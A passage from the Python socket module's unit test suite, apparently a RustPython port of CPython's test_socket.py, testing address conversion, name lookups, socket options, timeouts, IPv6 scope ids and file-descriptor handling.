socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
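    # For example, on a little-endian host socket.htons(0x1234) == 0x3412,
    # while on a big-endian host it is the identity; either way
    # htons(htons(x)) == x for any value that fits in 16 bits.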
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
        # The services are ordered so that ones with both a tcp and a udp
        # entry come first, at least on modern Linux systems.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
            # avoid the 'echo' service on this platform, as it has a
            # non-standard port/protocol entry that breaks the test's assumptions
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as s:
self.assertEqual(s.gettimeout(), None)
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not AIX:
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
        # XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate that it is
        # reasonable to get the host's addr in addition to 0.0.0.0.
        # At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
        # A freshly created socket should start with SO_REUSEADDR (reuse) == 0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.settimeout(1)
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
# TODO: RUSTPYTHON, windows ioctls
@unittest.expectedFailure
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
                self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
                              "not implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
# XXX RUSTPYTHON TODO: surrogates in str
# self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
                # or fail. All we care about here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
# TODO: RUSTPYTHON, socket.gethostbyname_ex
@unittest.expectedFailure
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
        # Windows, Linux and Mac OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipIf(sys.platform == 'win32', 'does not work on Windows')
@unittest.skipIf(AIX, 'Symbolic scope id does not work')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless( sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
        # To do this we fool socket.socket into believing it already has an
        # open fd, because on that path it doesn't actually verify the family
        # and type, and simply populates the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaisesRegex(TypeError, "integer argument expected"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaisesRegex(TypeError, "integer is required"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
